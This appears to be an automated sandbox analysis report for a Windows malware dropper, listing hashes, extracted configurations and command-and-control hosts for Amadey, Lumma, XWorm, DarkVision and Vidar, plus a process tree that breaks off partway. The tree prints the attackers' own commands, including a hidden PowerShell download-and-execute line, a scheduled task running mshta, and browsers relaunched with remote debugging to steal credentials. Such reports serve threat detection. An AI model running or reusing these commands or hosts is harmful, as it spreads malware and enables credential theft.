Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/04/2025, 05:56

General

  • Target

    random.exe

  • Size

    6.2MB

  • MD5

    f8e26aa8d0e36e4715bb611c8ee4325e

  • SHA1

    7b44a79eda592b45e12cf53209f257762b43f003

  • SHA256

    1af10179025d8901d6a774a0faa3a817095032a8d3a94c897fb78f57a896a129

  • SHA512

    7b3827617a6b165095c2466304fe85059bca89e871933bd967f76bef86cf09f1d2ae70f981c9cb70ae808c7c51a9b54891fa151b9b24dbb4b6c8dee7c38035bb

  • SSDEEP

    196608:4o9yNMMKE709CYUneSOv/g8NsIIyYyfeDhk/vA:X9i7n0TUneTgAGRd

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://pepperiop.digital/oage

https://jrxsafer.top/shpaoz

https://plantainklj.run/opafg

https://puerrogfh.live/iqwez

https://quavabvc.top/iuzhd

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://rambutanvcx.run/adioz

https://ywmedici.top/noagis

https://5pepperiop.digital/oage

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://wstarcloc.bet/GOksAo

https://atargett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://cosmosyf.top/GOsznj

https://starcloc.bet/GOksAo

Extracted

Family

xworm

Version

5.0

C2

127.0.0.1:9000

45.134.39.20:9000

Mutex

oV8zKY7m1pKloRzQ

Attributes
  • install_file

    USB.exe

aes.plain

Extracted

Family

darkvision

C2

82.29.67.160

Attributes
  • url

    http://107.174.192.179/data/003

    https://grabify.link/ZATFQO

    http://107.174.192.179/clean

  • user_agent

    Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36

Extracted

Family

vidar

Version

13.4

Botnet

f942dabea5a58a141236ae72e4720fbf

C2

https://t.me/f07nd

https://steamcommunity.com/profiles/76561199843252735

Attributes
  • user_agent

    Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • DarkVision Rat

    DarkVision Rat is a trojan written in C++.

  • Darkvision family
  • Detect Vidar Stealer 19 IoCs
  • Detect Xworm Payload 1 IoCs
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 12 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Uses browser remote debugging 2 TTPs 11 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 29 IoCs
  • Identifies Wine through registry keys 2 TTPs 9 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Windows directory 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 27 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 20 IoCs
  • Suspicious use of FindShellTrayWindow 33 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3456
      • C:\Users\Admin\AppData\Local\Temp\random.exe
        "C:\Users\Admin\AppData\Local\Temp\random.exe"
        2⤵
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:208
        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\K7t97.exe
          C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\K7t97.exe
          3⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3828
          • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1x99z3.exe
            C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1x99z3.exe
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:4152
            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
              "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Downloads MZ/PE file
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:2776
              • C:\Users\Admin\AppData\Local\Temp\10469560101\YMauSAr.exe
                "C:\Users\Admin\AppData\Local\Temp\10469560101\YMauSAr.exe"
                6⤵
                • Executes dropped EXE
                PID:2220
              • C:\Users\Admin\AppData\Local\Temp\10472140101\VrQSuEQ.exe
                "C:\Users\Admin\AppData\Local\Temp\10472140101\VrQSuEQ.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:1068
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4612
              • C:\Users\Admin\AppData\Local\Temp\10473240101\wQI4o11.exe
                "C:\Users\Admin\AppData\Local\Temp\10473240101\wQI4o11.exe"
                6⤵
                • Suspicious use of NtCreateUserProcessOtherParentProcess
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:3796
              • C:\Users\Admin\AppData\Local\Temp\10473260101\43ee895fb1.exe
                "C:\Users\Admin\AppData\Local\Temp\10473260101\43ee895fb1.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                • Suspicious use of WriteProcessMemory
                PID:2280
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c schtasks /create /tn XkTFvma3Vwx /tr "mshta C:\Users\Admin\AppData\Local\Temp\XpwJOH7Ch.hta" /sc minute /mo 25 /ru "Admin" /f
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:1656
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /tn XkTFvma3Vwx /tr "mshta C:\Users\Admin\AppData\Local\Temp\XpwJOH7Ch.hta" /sc minute /mo 25 /ru "Admin" /f
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:932
                • C:\Windows\SysWOW64\mshta.exe
                  mshta C:\Users\Admin\AppData\Local\Temp\XpwJOH7Ch.hta
                  7⤵
                  • Checks computer location settings
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:448
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'5PLKCXZ0NTKTVWHWT2CWGAAF9RTVS64C.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                    8⤵
                    • Blocklisted process makes network request
                    • Command and Scripting Interpreter: PowerShell
                    • Downloads MZ/PE file
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:4060
                    • C:\Users\Admin\AppData\Local\Temp5PLKCXZ0NTKTVWHWT2CWGAAF9RTVS64C.EXE
                      "C:\Users\Admin\AppData\Local\Temp5PLKCXZ0NTKTVWHWT2CWGAAF9RTVS64C.EXE"
                      9⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4396
              • C:\Users\Admin\AppData\Local\Temp\10473270101\dfaa94e428.exe
                "C:\Users\Admin\AppData\Local\Temp\10473270101\dfaa94e428.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:4148
              • C:\Users\Admin\AppData\Local\Temp\10473280101\wQI4o11.exe
                "C:\Users\Admin\AppData\Local\Temp\10473280101\wQI4o11.exe"
                6⤵
                • Suspicious use of NtCreateUserProcessOtherParentProcess
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:1068
              • C:\Users\Admin\AppData\Local\Temp\10473290101\VrQSuEQ.exe
                "C:\Users\Admin\AppData\Local\Temp\10473290101\VrQSuEQ.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:1704
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  7⤵
                    PID:1364
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                    7⤵
                      PID:4592
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                      7⤵
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4548
                  • C:\Users\Admin\AppData\Local\Temp\10473300101\amnew.exe
                    "C:\Users\Admin\AppData\Local\Temp\10473300101\amnew.exe"
                    6⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • Drops file in Windows directory
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of FindShellTrayWindow
                    PID:4060
                    • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                      "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                      7⤵
                      • Downloads MZ/PE file
                      • Checks computer location settings
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:4808
                      • C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
                        "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
                        8⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:1680
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          9⤵
                          • System Location Discovery: System Language Discovery
                          • Checks processor information in registry
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4296
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                            10⤵
                            • Uses browser remote debugging
                            • Checks processor information in registry
                            • Enumerates system info in registry
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of FindShellTrayWindow
                            PID:1476
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff9932edcf8,0x7ff9932edd04,0x7ff9932edd10
                              11⤵
                                PID:4872
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2012,i,12362845459960481967,15227313676883810554,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2004 /prefetch:2
                                11⤵
                                  PID:3976
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2092,i,12362845459960481967,15227313676883810554,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2132 /prefetch:3
                                  11⤵
                                    PID:1520
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2400,i,12362845459960481967,15227313676883810554,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2556 /prefetch:8
                                    11⤵
                                      PID:4700
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3052,i,12362845459960481967,15227313676883810554,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3064 /prefetch:1
                                      11⤵
                                      • Uses browser remote debugging
                                      PID:368
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3080,i,12362845459960481967,15227313676883810554,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3112 /prefetch:1
                                      11⤵
                                      • Uses browser remote debugging
                                      PID:1060
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4228,i,12362845459960481967,15227313676883810554,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4256 /prefetch:2
                                      11⤵
                                      • Uses browser remote debugging
                                      PID:4144
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4668,i,12362845459960481967,15227313676883810554,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4660 /prefetch:1
                                      11⤵
                                      • Uses browser remote debugging
                                      PID:4848
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5348,i,12362845459960481967,15227313676883810554,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5356 /prefetch:8
                                      11⤵
                                        PID:4448
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5548,i,12362845459960481967,15227313676883810554,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5592 /prefetch:8
                                        11⤵
                                          PID:5140
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5404,i,12362845459960481967,15227313676883810554,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5376 /prefetch:8
                                          11⤵
                                            PID:5488
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5720,i,12362845459960481967,15227313676883810554,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5676 /prefetch:8
                                            11⤵
                                              PID:5548
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5736,i,12362845459960481967,15227313676883810554,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5612 /prefetch:8
                                              11⤵
                                                PID:5588
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5240,i,12362845459960481967,15227313676883810554,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5748 /prefetch:8
                                                11⤵
                                                  PID:5960
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                10⤵
                                                • Uses browser remote debugging
                                                PID:5184
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --edge-skip-compat-layer-relaunch
                                                  11⤵
                                                  • Uses browser remote debugging
                                                  • Checks processor information in registry
                                                  • Enumerates system info in registry
                                                  • Modifies data under HKEY_USERS
                                                  • Modifies registry class
                                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                  • Suspicious use of FindShellTrayWindow
                                                  PID:5216
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x248,0x7ff99376f208,0x7ff99376f214,0x7ff99376f220
                                                    12⤵
                                                      PID:5316
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1912,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=2224 /prefetch:3
                                                      12⤵
                                                        PID:6128
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2196,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=2192 /prefetch:2
                                                        12⤵
                                                          PID:6120
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2420,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=2788 /prefetch:8
                                                          12⤵
                                                            PID:6072
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3556,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=3588 /prefetch:1
                                                            12⤵
                                                            • Uses browser remote debugging
                                                            PID:5732
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3532,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=3552 /prefetch:1
                                                            12⤵
                                                            • Uses browser remote debugging
                                                            PID:5740
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=1808,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=4320 /prefetch:1
                                                            12⤵
                                                            • Uses browser remote debugging
                                                            PID:4536
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4164,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=4324 /prefetch:2
                                                            12⤵
                                                            • Uses browser remote debugging
                                                            PID:2808
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4168,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=4348 /prefetch:8
                                                            12⤵
                                                              PID:1472
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5124,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=3968 /prefetch:8
                                                              12⤵
                                                                PID:932
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4756,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=4012 /prefetch:8
                                                                12⤵
                                                                  PID:1964
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4752,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=5304 /prefetch:8
                                                                  12⤵
                                                                    PID:4628
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
